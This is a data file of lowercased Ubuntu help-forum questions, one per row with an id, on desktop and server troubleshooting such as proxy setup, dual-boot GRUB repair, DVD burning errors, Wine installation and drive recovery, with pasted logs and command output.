210857	how to setup and configure proxy server in linux box for a network ?	in ubuntu , i am going to start squid and squish for proxy setup , but have problems in squid to make every workstation use proxy . setup and configuration of squid is working properly , for testing purpose manual proxy address is working in my workstation , but how to make it possible for other workstations ? also , i have to setup proxy when user click on automatically detect proxy setup then it works , i 'll try to find a lot of stuff regarding this but did n't understand properly . in squid.conf file , i 'll set acl localnet 10.0.23.0/24 and allow http_access , after this set own ip address in manual proxy tab and it works , but not for all other systems which exist in our subnetwork . its like i have to setup a proxy server on my system and set for all other workstations .
210858	screen brightness keys do n't work	i read the same problems but i did n't find an answer . i can change my brightness by slider in `` brightness and lock '' but when i press the key button it goes to lowest level and when i press the other button it just become lighter just one level and i just can switch between this two dark levels . is there anyway i can repair it without changing it manually ?
210862	can not burn iso image to dvd using any burner	i tried to burn iso image to dvd using my laptops dvd writer , but i am unable to do so . i am using ubuntu 10.10 and have used brasero , gnomebaker and acetoneiso burner . all of these burner throws the same error.i.e power calibration error following is the log file that is generated when trying brasero burner . checking session consistency ( brasero_burn_check_session_consistency brasero-burn.c:1744 ) braseroburnuri called brasero_job_get_action braseroburnuri called brasero_job_get_action braseroburnuri called brasero_job_set_output_size_for_current_track braseroburnuri stopping braseroburnuri called brasero_job_get_action braseroburnuri called brasero_job_get_session_output_size braseroburnuri output set ( image ) image = /tmp/brasero_tmp_2wo4lw.bin toc = none braseroburnuri called brasero_job_get_session_output_size braseroburnuri called brasero_job_get_action braseroburnuri called brasero_job_get_current_track braseroburnuri no burn : // uri found braseroburnuri stopping braserolocaltrack called brasero_job_get_action braserolocaltrack called brasero_job_get_action braserolocaltrack called brasero_job_set_output_size_for_current_track braserolocaltrack stopping braserolocaltrack called brasero_job_get_action braserolocaltrack called brasero_job_get_session_output_size braserolocaltrack output set ( image ) image = /tmp/brasero_tmp_sdo4lw.bin toc = none braserolocaltrack called brasero_job_get_session_output_size braserolocaltrack called brasero_job_get_action braserolocaltrack called brasero_job_get_current_track braserolocaltrack no remote uris braserolocaltrack stopping braserochecksumimage called brasero_job_get_current_track braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_flags braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_fd_in braserochecksumimage called brasero_job_set_output_size_for_current_track braserochecksumimage stopping braserochecksumimage called brasero_job_get_current_track braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_flags braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_session_output_size braserochecksumimage output set ( image ) image = /tmp/brasero_tmp_9sn4lw.bin toc = none braserochecksumimage called brasero_job_get_session_output_size braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_action braserochecksumimage called brasero_job_get_current_track braserochecksumimage called brasero_job_get_input_type braserochecksumimage called brasero_job_set_current_action braserochecksumimage called brasero_job_get_fd_in braserochecksumimage called brasero_job_get_current_track braserochecksumimage called brasero_job_get_current_track braserochecksumimage starting checksuming file /media/others/vbox_srijan/downloads/iso/ubuntu-12.04-beta1-desktop-i386.iso ( size = 736407552 ) braserochecksumimage called brasero_job_get_fd_out braserochecksumimage called brasero_job_get_current_track braserochecksumimage setting new checksum ( type = 2 ) 12e04b6893802d3b1935296bfbfe0910 ( ( null ) before ) braserochecksumimage finished track successfully braserochecksumimage stopping braserolibburn called brasero_job_get_action braserolibburn called brasero_job_get_action braserolibburn unsupported operation braserolibburn deactivating braserolibburn called brasero_job_get_action braserolibburn called brasero_job_get_action braserolibburn called brasero_job_get_device braserolibburn drive ( /dev/sr0 ) init result = 1 braserolibburn called brasero_job_get_flags braserolibburn called brasero_job_get_media braserolibburn called brasero_job_get_fd_in braserolibburn called brasero_job_get_tracks braserolibburn setting multi 0 braserolibburn setting burnproof 1 braserolibburn setting dummy 0 braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn burn_drive_convert_fs_adr ( /dev/sr0 ) braserolibburn writing braserolibburn called brasero_job_set_dangerous braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_set_current_action braserolibburn burn_drive_is_enumerable_adr ( /dev/sr0 ) is true braserolibburn called brasero_job_set_current_action braserolibburn async start unit succeeded after 0.1 seconds braserolibburn called brasero_job_set_current_action braserolibburn dvd pre-track 01 : demand=736407552 , cap=4706074624 braserolibburn called brasero_job_set_current_action braserolibburn scsi error condition on command 2ah write ( 10 ) : [ 3 73 02 ] power calibration area is full braserolibburn closing braserolibburn called brasero_job_set_dangerous braserolibburn called brasero_job_set_current_action braserolibburn libburn reported an error scsi error on write ( 0,16 ) : [ 3 73 02 ] power calibration area is full braserolibburn called brasero_job_error braserolibburn finished with an error braserolibburn asked to stop because of an error error = 1 message = `` scsi error on write ( 0,16 ) : [ 3 73 02 ] power calibration area is full '' braserolibburn stopping session error : scsi error on write ( 0,16 ) : [ 3 73 02 ] power calibration area is full ( brasero_burn_record brasero-burn.c:2862 ) this is the error i am getting .
210864	how to install windows games on ubuntu ?	would you please tell me how to install windows games on ubuntu ? i really need it .
210870	nexus 7 dual-boot with android ?	is it possible to install ubuntu in parallel to android on the nexus 7 ( dual-boot ) , or not ? if not , how hard would it be to add the feature ? it should be just a matter of adding another partition and installing a boot manager , right ?
210871	how to install a specific version of g++ ?	in my ubuntu there is g++ -- version - g++ ( ubuntu 4.4.3-4ubuntu5.1 ) 4.4.3 copyright ( c ) 2009 free software foundation , inc . this is free software ; see the source for copying conditions . there is no warranty ; not even for merchantability or fitness for a particular purpose . i want to have same g++ -- version on another linux machine which has - g++ ( gcc ) 4.1.2 20070626 ( red hat 4.1.2-14 ) copyright ( c ) 2006 free software foundation , inc . this is free software ; see the source for copying conditions . there is no warranty ; not even for merchantability or fitness for a particular purpose . how can i alter my g++ version to be the same as the above ?
210872	cleanly uninstall ubuntu from nexus 7	if i install ubuntu on the nexus 7 ( following the instructions at https : //wiki.ubuntu.com/nexus7/installation ) , and later uninstall it , will the device be in the original state , or will there be traces left behind ? i 'm especially concerned about the following : do i void the warranty ? ( in practice , not strictly legally . can i bring the re-flashed device back to the store and pretend it 's original ? ) can i re-lock the bootloader ? are there 'fuses ' or tamper detection switches that tell that there was once something else installed ? do i loose features in android if i once unlocked the bootloader or installed ubuntu ( like being able to play drmed videos ) ?
210874	dell inspiron wifi off	i installed a fresh install of ubuntu 12.10 and this is my first ubuntu install . i have a dell inspiron 6400 and my wifi is turned off and cant seem to switch it on . i searched a lot on it but can only find answers for ubuntu 12.04 : ( can someone help me please ? thanks in advance
210879	external usb 3 drive not recognized	ubuntu 12.10 64 bit seems not to recognize my external hard disk . it is a vantec nst-310s3 external disk enclosure with a wd 3tb drive . the disk has two ntfs partitions . my pc is a dual boot system . under windows 7 the hard disk works fine but i ca n't make it work with ubuntu . when the drive is connected to the pc then the command sudo fdisk -l seems to hang forever . below are the output of lsusb and cat /proc/partitions without the external drive and then with it connected . i added also the last lines of the dmesg command at the end . first without the drive : ilan @ linux : ~ $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 13ba:0017 unknown ps/2 keyboard+mouse adapter bus 001 device 004 : id 046d : c50e logitech , inc. cordless mouse receiver bus 001 device 005 : id 0ac8:3420 z-star microelectronics corp. venus usb2.0 camera ilan @ linux : ~ $ cat /proc/partitions major minor # blocks name 8 0 1953514584 sda 8 1 102400 sda1 8 2 629043200 sda2 8 3 367001600 sda3 8 4 1 sda4 8 5 471859200 sda5 8 6 157286400 sda6 8 7 324115456 sda7 8 8 4101120 sda8 11 0 1048575 sr0 second with the usb 3 drive : ilan @ linux : ~ $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 004 device 002 : id 174c:55aa asmedia technology inc . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 13ba:0017 unknown ps/2 keyboard+mouse adapter bus 001 device 004 : id 046d : c50e logitech , inc. cordless mouse receiver bus 001 device 005 : id 0ac8:3420 z-star microelectronics corp. venus usb2.0 camera ilan @ linux : ~ $ cat /proc/partitions major minor # blocks name 8 0 1953514584 sda 8 1 102400 sda1 8 2 629043200 sda2 8 3 367001600 sda3 8 4 1 sda4 8 5 471859200 sda5 8 6 157286400 sda6 8 7 324115456 sda7 8 8 4101120 sda8 11 0 1048575 sr0 8 16 2930266584 sdb ilan @ linux : ~ $ lsusb -v -s 004:002 bus 004 device 002 : id 174c:55aa asmedia technology inc. could n't open device , some information will be missing device descriptor : blength 18 bdescriptortype 1 bcdusb 3.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 9 idvendor 0x174c asmedia technology inc. idproduct 0x55aa bcddevice 1.00 imanufacturer 2 iproduct 3 iserial 1 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 44 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xc0 self powered maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 8 mass storage binterfacesubclass 6 scsi binterfaceprotocol 80 bulk-only iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0400 1x 1024 bytes binterval 0 bmaxburst 15 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0400 1x 1024 bytes binterval 0 bmaxburst 15 ilan @ linux : ~ $ sudo fdisk -l [ sudo ] password for ilan : disk /dev/sda : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf1b4f1ee device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 1258293247 629043200 7 hpfs/ntfs/exfat /dev/sda3 1258293248 1992296447 367001600 7 hpfs/ntfs/exfat /dev/sda4 1992298494 3907028991 957365249 f w95 ext 'd ( lba ) /dev/sda5 1992298496 2936016895 471859200 7 hpfs/ntfs/exfat /dev/sda6 2936018944 3250591743 157286400 7 hpfs/ntfs/exfat /dev/sda7 3250593792 3898824703 324115456 83 linux /dev/sda8 3898826752 3907028991 4101120 82 linux swap / solaris dmesg output after connecting the external drive : [ 23.740567 ] e1000e : eth0 nic link is up 1000 mbps full duplex , flow control : rx/tx [ 23.740786 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready [ 49.144673 ] usb 4-1 : > new superspeed usb device number 2 using xhci_hcd [ 49.163039 ] usb 4-1 : > parent hub missing lpm exit latency info . power management will be impacted . [ 49.166789 ] usb 4-1 : > new usb device found , idvendor=174c , idproduct=55aa [ 49.166793 ] usb 4-1 : > new usb device strings : mfr=2 , product=3 , serialnumber=1 [ 49.166796 ] usb 4-1 : > product : as2105 [ 49.166799 ] usb 4-1 : > manufacturer : asmedia [ 49.166801 ] usb 4-1 : > serialnumber : 0123456789abcdef [ 49.206372 ] usbcore : registered new interface driver uas [ 49.228891 ] initializing usb mass storage driver ... [ 49.229042 ] scsi6 : usb-storage 4-1:1.0 [ 49.229115 ] usbcore : registered new interface driver usb-storage [ 49.229116 ] usb mass storage support registered . [ 64.045528 ] scsi 6:0:0:0 : > direct-access wdc wd30 ezrx-00mmmb0 80.0 pq : 0 ansi : 0 [ 64.046224 ] sd 6:0:0:0 : > attached scsi generic sg2 type 0 [ 64.046881 ] sd 6:0:0:0 : > [ sdb ] very big device . trying to use read capacity ( 16 ) . [ 64.047610 ] sd 6:0:0:0 : > [ sdb ] 5860533168 512-byte logical blocks : ( 3.00 tb/2.72 tib ) [ 64.048368 ] sd 6:0:0:0 : > [ sdb ] write protect is off [ 64.048373 ] sd 6:0:0:0 : > [ sdb ] mode sense : 23 00 00 00 [ 64.048984 ] sd 6:0:0:0 : > [ sdb ] no caching mode page present [ 64.048987 ] sd 6:0:0:0 : > [ sdb ] assuming drive cache : write through [ 64.049297 ] sd 6:0:0:0 : > [ sdb ] very big device . trying to use read capacity ( 16 ) . [ 64.050942 ] sd 6:0:0:0 : > [ sdb ] no caching mode page present [ 64.050944 ] sd 6:0:0:0 : > [ sdb ] assuming drive cache : write through [ 94.245006 ] usb 4-1 : > reset superspeed usb device number 2 using xhci_hcd [ 94.262553 ] usb 4-1 : > parent hub missing lpm exit latency info . power management will be impacted . [ 94.263805 ] xhci_hcd 0000:03:00.0 : > xhci xhci_drop_endpoint called with disabled ep ffff8800d37d1c00 [ 94.263808 ] xhci_hcd 0000:03:00.0 : > xhci xhci_drop_endpoint called with disabled ep ffff8800d37d1c40 [ 125.262722 ] usb 4-1 : > reset superspeed usb device number 2 using xhci_hcd [ 125.280304 ] usb 4-1 : > parent hub missing lpm exit latency info . power management will be impacted . [ 125.281511 ] xhci_hcd 0000:03:00.0 : > xhci xhci_drop_endpoint called with disabled ep ffff8800d37d1c00 [ 125.281516 ] xhci_hcd 0000:03:00.0 : > xhci xhci_drop_endpoint called with disabled ep ffff8800d37d1c40
210884	setting ld_library_path for cuda	installing the cuda toolkit results in the following instructions being printed to the console . please make sure your ld_library_path for 64-bit linux distributions includes /usr/local/cuda-5.0/lib64 : /usr/local/cuda-5.0/lib or for 64-bit linux distributions add /usr/local/cuda-5.0/lib64 and /usr/local/cuda-5.0/lib to /etc/ld.so.conf and run ldconfig as root the following code in /etc/profile had no effect . if [ -z `` $ ld_library_path '' ] ; then ld_library_path=/usr/local/cuda-5.0/lib64 : /usr/local/cuda-5.0/lib else ld_library_path= $ ld_library_path : /usr/local/cuda-5.0/lib64 : /usr/local/cuda-5.0/lib fi export ld_library_path that is , rebooting and issuing echo $ ld_library_path showed the variable was not defined . to try the alternative suggestion , i added the two lines to the file /etc/ld.so.conf so my file looks like this include /etc/ld.so.conf.d/*.conf /usr/local/cuda-5.0/lib64 /usr/local/cuda-5.0/lib then i issued : sudo ldconfig then echo $ ld_library_path still the environment variable was not set . how do i comply with the cuda installation instructions shown above ?
210890	wake-on-lan under ubuntu 12.04	i would like to setup the wake-on-lan , the two pcs are connected through a switch . here is the configuration of the eth0 , in the bios i could n't find any information regarding the wake-on-lan . supported ports : [ tp mii ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full advertised pause frame use : symmetric receive-only advertised auto-negotiation : yes link partner advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full link partner advertised pause frame use : symmetric link partner advertised auto-negotiation : yes speed : 1000mb/s duplex : full port : mii phyad : 0 transceiver : internal auto-negotiation : on supports wake-on : pumbg wake-on : g current message level : 0x00000033 ( 51 ) drv probe ifdown ifup link detected : yes after i shut down the pc , i used different tools to send out the magic package , but nothing happens . any suggestion ?
210891	problem installing wine on ubuntu 12.10	i am having problem when installing wine on ubuntu 12.10 i tried to following some tutorial but none of them work . **root @ ubuntu : ~ # add-apt-repository ppa : ubuntu-wine/ppa** **root @ ubuntu : ~ # apt-get update** **root @ ubuntu : ~ # apt-get install wine1.5** reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.5 : depends : wine1.5-i386 ( = 1.5.16-0ubuntu1 ) but it is not installable recommends : ttf-droid recommends : ttf-mscorefonts-installer but it is not going to be installed recommends : ttf-umefont but it is not going to be installed recommends : ttf-unfonts-core but it is not going to be installed recommends : winbind but it is not going to be installed recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages . root @ ubuntu : ~ # anyone can help me how to solve th problem ?
210892	is there a way to use lightdm and unity but get a lock screen like gdm in 12.10 ?	i like the gdm locked screen theme a lot ! but even if i set gdm as the display manager but log in to unity session , the lock screen remains that oh lightdm ... i want to use lightdm as my login display manager ( as it boots up faster than gdm ) but gdm as my lockscreen dm ( as it looks better than lightdm ) ... is this possible ? and how ?
210895	what are the files in /dev/input/ and what they do ?	i 'm fairly new to ubuntu and i 've started to search around everywhere and check everything ! recently i saw these files at /dev/input/eventx , js0 , mice , mousex . by printing the output using `` cat '' i realized they are somehow responsible for mouse and keyboard input but the output had an strange character encoding ( even for the keyboard ) . my questions are , what are these files and how can i interpret the data of these files ? are there any other places that i can access the input/output of my ubuntu machine ? and are there any ebooks , manual or something similar that i can check the duty and structure of ubuntu system files ? ( i.e . to find the answer of such question ) update to make the data of the file more readable , i used hexdump : sudo cat /dev/input/by-id/ < nameofthemouse > | hexdump -c [ source ]
210900	ubuntu 12.10 + gnome 3.6 : suspend button does not work	clicking suspend button from top right corner menu in gnome desktop environment , does nothing . i have alternative status menu extension enabled through tweak tools but it seems ineffective . is there a work-around ?
210901	ubuntu 11.04 server adding desktop environment	i am using ubuntu 11.04 server . i installed a desktop environment to ubuntu server for graphical usage . i installed ubuntu desktop : sudo apt-get install ubuntu-desktop but it only works when i have an internet connection . is it possible to have desktop environment without an internet connection ?
210902	how to revert back to nautilus 3.4 ?	i installed gnome de and the packages and nautilus got updated to 3.6 but i do n't like it . i removed gnome de packages but nautilus still remains at 3.6 . how can i revert back to 3.4 ?
210910	how do i uninstall libreoffice ?	installing libreoffice manually on ubuntu 12.04 works great following the advice in this answer : http : //askubuntu.com/a/182602/103893 it basically is a matter of downloading the most recent release from the libreoffice site and running sudo apt-get remove libreoffice-core and sudo dpkg -i *.deb . doing the above i installed libreoffice 3.6.3 and it works great . but what is the best way to uninstall this new version of libreoffice ( for when the next release is coming along ) ? trying sudo apt-get remove libreoffice-core will not do anything , and sudo apt-get remove libreoffice3.6 does not seem to remove all packages installed with dpkg ... ?
210911	need help with fixing grub dualboot windows7 and ubuntu	i have a running windows 7 and installed precise along with it just this afternoon . i was doing a manual partition configuration . on the part where i get to set what partition to install the bootloader/mbr i chose the windows partition . now every time i choose windows 7 from grub , it just reverts back to the grub menu . i 've been reading around the web as i type this and found this tool 'bootinfo ' to let you see my configuration . here 's the pastebin : boot info any help would do . thanks !
210913	new hard drive not recognized on a dell adaptec 2610sa 6 port sata raid pci card	i have a dell adaptec 2610sa 6 port sata raid pci card with 3 hard drives on it and everything works fine . i plugged another hard drive to it and the system ( ubuntu 12.04 , 64 bit ) seems not to recognize it . strange thing is that , as happened in the past , if i re-install the system , it recognizes the new hardware plugged to raid card . of course i do n't want to re-install ubuntu each time i plug a new hard drive on my raid card . any idea ? thank you in advance
210914	grub does not show a windows 8 option after dual boot	so , i 've successfully dual-booted my windows 8 machine with ubuntu 12.04 . however , i still do n't have a convenient method of choosing what os to load at boot time . after installing ubuntu , my computer still loads windows 8 directly . i then added grubx64.efi to the white list of my boot loader . but after that , my machine loads ubuntu directly without even a shadow of grub showing up ! i used boot-repair and i got this paste.ubuntu url : paste.ubuntu.com/1326074 . after running boot-repair ( and re-white listing the grubx64.efi file ) , grub now shows up but without any windows 8 option ! lastly , i ran sudo fdisk -l and it gave me this : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x6396389f device boot start end blocks id system /dev/sda1 1 1465149167 732574583+ ee gpt partition 1 does not start on physical sector boundary . i 'm guessing my problem has something to do with the warning from fdisk above but i do n't know what to do with it . how do i proceed now ? edit my etc/default/grub is as follows : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' also , just for the record , this is what i followed in installing my dual-boot . the tutorial ( which uses , 11.10 , i must note ) , does n't mention anything about this problem . is there anything there i should n't have done ?
210918	how to edit gnome/unity menus without using alacarte ?	alacarte crashes every time i attempt to edit a submenu or move an item from one submenu to another and then i 'd have to wipe the application.menu files or my gnomeshell desktop would be useless . is there a way to organize my main menu and unity dash applications subcategories without using alacarte ? i 've got so many items installed in the wrong category and i 'd also like to remove a ton of zombie icons .
210919	can i connect to a specific workspace via vnc ?	i am running xbmc on my ubuntu . but from time to time , i have to vnc into my system to do some maintenance . i then have to minimize my xbmc first . can i connect to another workspace instead ? somewhere i read that i can connect to port 5901 , 5902 and so on . but it does not work . i do not wish to install any other vnc server as i want to keep a lean setup , but i am open to options . thanks for answering .
210921	`` the identity of this website has not been verified . ''	i 'm using chrome on ubuntu 12.10 . there are always message from chrome : `the identity of this website has not been verified . your connection to askubuntu.com is not encrypted.` facebook and twitter do not appear such message . what 's wrong ? what can i do ?
210923	ubuntu security with services running from /opt	it took me a while to understand what 's going on here ( i think ) , but can someone explain to me if there are security risks with regards to my logic of what 's going on here as i am trying to set up a home web server as a developer with some good linux knowledge ? ubuntu is not like other systems , as it has restricted the root user account . you can not log in as root or su to root . this was a problem for me as i have had to install numerous applications and services to /opt as per user documentation ( xamppfor linux is a good example ) . the problem here is that this directory is owned by root : root . i notice that my admin user account does not belong to root group through the following command : groups username so my understanding is that even though the files and services that i place in /opt belong to root , executing them by means of sudo ( as required ) does not mean that they are run as root ? i imagine that the sudo command is hidden somewhere under belonging to the root user and has a 775 permission ? so the question i have is if running a service like tomcat , apcahe , etc exposes my system like on other systems ? obviously i need to secure these in configurations , but is n't the golden rule to never run something as root ? what happens if i have multiple services running under same user/group with regards to a compromised server ?
210925	no option to boot ubuntu in a dual-boot machine	i have installed ubuntu 12.10 next to windows 7 in a separate ntfs partition . i can boot windows 7 but i ca n't find a way to choose ubuntu and boot into it . what do i do ?
210926	non-sudo user command line tools	i’ve got some non-sudo users and certain command line tools don’t work for them – but they do in other linux os . for example , pressing up would normally give you your last used command , and pressing tab would complete the rest of a directory or file name . neither of these work for non-sudo users . i don’t want to give them sudo access , but i’ve used them successfully in centos and was wondering if similar permissions where possible in ubuntu server ?
210928	stream vob files from dvd rips over my network to dlna tv	i want to stream dvd rips over my network from my media server pc to my dlna enabled tv . i am currently using `` total media player 5 '' by arcsoft as my player and `` my movies '' by binnerup as my movie management program , the latter of which rips the dvd and stores the movie as many multiple vob files . the dlna enabled tv sees and plays any one vob file in the media server folder but then stops and requires another instruction to play the next vob file , followed by another play instruction and again another , etc . it does not consecutively tie them together in a continuous stream and i would be grateful for any assistance or information that may assist me to stream vob files over my existin lan . thanks - con .
210930	restore files from ubuntu one impossible	my laptop was stolen , it had ubuntu one installed on it . now i have a new laptop , again with ubuntu one . when i access my account i can see lots of files from the old one but i ca n't restore them in a readable form . i tried the steps i found on the web but the files are still encrypted , i have no idea what to do with all those gpg files in the folder . i just want to restore them on the new laptop and see what i can recover from all the info i 've lost . one of the replies i found on the net said that they will automatically appear in the new ubuntu one folder . however , they do not .
210931	animations in ubuntu 12.10 like in ubuntu 9	i recently installed ubuntu 12.10 . previously i was using ubuntu 9 . this release has a nice ui makeover , but i no longer could use the awesome animations that were in ubuntu 9 . i could n't find the appearance ( graphics settings ) in this version of ubuntu , like it was there when i was using ubuntu 9 . while dragging a window , it would drag with some effect and while pressing alt+tab the switching windows was also a great animation effect . now i ca n't find any of these effects in ubuntu 12.10 .
210933	can i install ubuntu mobile on my cellphone acer e101 ?	hi i would like to know if there is a version of ubuntu mobile so that i can remove windows mobile 6.5 and install ubuntu mobile .and i would like to know how to install it .
210936	creating abootable usb for use on acer aspire one using a macbook	last night i tried to upgrade an acer aspire one that my granddaughter uses to ubuntu 12.0.4 but it failed before it finished and now the machine wo n't start at all . i 've had a look at how to create a bootable usb but the instructions do n't seem to cater for cross platform situations . i have a macbook running snow leopard and i want to create a bootable usb that will allow me to restore the acer aspire one to a working state running ubuntu 12.0.4 . any advice would be much appreciated .
210937	mounted smb share throu fstab , gets read only on added files	i mounted my nas in ubuntu 12.10 and it works with read/write , but when i 'm adding a file or directory that file gets read only permissions . my fstab mount looks like this : //192.168.0.12/share/ /media/nas cifs credentials=/home/jocke/.smbcredentials , iocharset=utf8 , file_mode=0777 , dir_mode=0777 0 0 if i mount the smb share manualy through the gui it works , but not through fstab . what i am doing wrong ?
210941	live usb with encrypted persistent store	is it possible to boot ubuntu from usb and have it store the changes to settings , created files and installed apps in an enrypted file located on the hdd that is mounted at boot ? if so will the process impair bootup speed much ? the goal would be maximum security if you make the usb read-only and the peristent store is encrypted .
210942	dual boot windows 8 and ubuntu	my laptop has two hard drives , one 320gb hdd and a 30gb ssd . i installed windows 8 on the hdd and ubuntu on the ssd . however , after i installed ubuntu , windows 8 did not appear on the boot list . i tried boot-repair , but this did n't help.here is the output of my fdisk -l : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6cd9314a device boot start end blocks id system /dev/sda1 * 2048 625139711 312568832 7 hpfs/ntfs/exfat disk /dev/sdb : 30.0 gb , 30016659456 bytes 255 heads , 63 sectors/track , 3649 cylinders , total 58626288 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6cd93132 device boot start end blocks id system /dev/sdb1 * 2048 207126 102539+ 83 linux /dev/sdb2 208894 58626047 29208577 5 extended /dev/sdb5 208896 4112383 1951744 82 linux swap / solaris /dev/sdb6 4114432 58626047 27255808 83 linux disk /dev/mmcblk0 : 3965 mb , 3965190144 bytes 49 heads , 48 sectors/track , 3292 cylinders , total 7744512 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0009c694 device boot start end blocks id system /dev/mmcblk0p1 * 8192 7744511 3868160 b w95 fat32 i also tried sudo grub-update , but that also did nothing .
210944	how to download windows 8 on ubuntu ?	i want to switch back to windows , and they have a deal to download it from the website for $ 40 when i click that button it brings up a windows 8 assistant that downloads , but when i click on it nothing happens . my ubuntu is completely upgraded , btw . i have wine and wine tricks as well . and i am a fairly novice ubuntu user . so please keep that in mine
210947	ubuntu 12.10 does n't boot after fresh installation	i did a clean install of ubuntu 12.10 and everything went fine but after restart it does n't load . it is the only os on my hdd . why does n't ubuntu load after installation ?
210948	ubuntu one promotion	it says on the website that if we buy any music track from the ubuntu store , we 'll get free music streaming for six months + 20gb of free storage . i know that the music streaming service will expire after six months if we do n't intend on continuing it , but does the 20gb of storage expire too unless we continue to pay ?
210950	is it advisable to become root in ubuntu to work with other users ' files ?	when i moved to ubuntu i worked hard to get out of the habit of working as root . however , is the situation below an example of one of the few times that a user should become root ? - neptune : ~ $ cd ../testuser/.kde/ bash : cd : ../testuser/.kde/ : permission denied - neptune : ~ $ sudo cd ../testuser/.kde/ sudo : cd : command not found note that i do happen to have the password for testuser , however i feel that working as root is preferable to suing to testuser . thanks . edit : upon researching solutions i see that my best course of action is to just su to the user whose files i intend to start scripting on .
210955	recovering broken drive	i have a 320 gb external drive which isnt detected automatically when i plug it ( neither on windows7 nor ubuntu 10.04 ) under windows i can recover the data with photorec ( but it doesnt preserve names or folder structure , which renders it useless since there are around 200 gb of data ) recovermyfiles ( demo , costs way to much to buy ) can also view everything , but the drive makes clicking noises when being accessed ( around 10-20 clicks per minute ) . so i switched to ubuntu and the drive is shown when running fdisk , with no apparent errors , it also stopped clicking . following the steps at https : //help.ubuntu.com/community/datarecovery i used ddrescue to copy whatever i can get to a healthy external drive and it finished without errors but produced only 2 files totaling 3 gb on the healthy drive which i couldnt access . i unmounted the drive and now i cant mount it again with `` mount -t vfat /dev/sdb1 /media/backup '' i have no idea what to do now . the data is not corrupted but i dont know how to access it . i am afraid to use testdisk because its not very user friendly and i dont want to make irreversible changes that im going to regret later . here are the exact commands i used 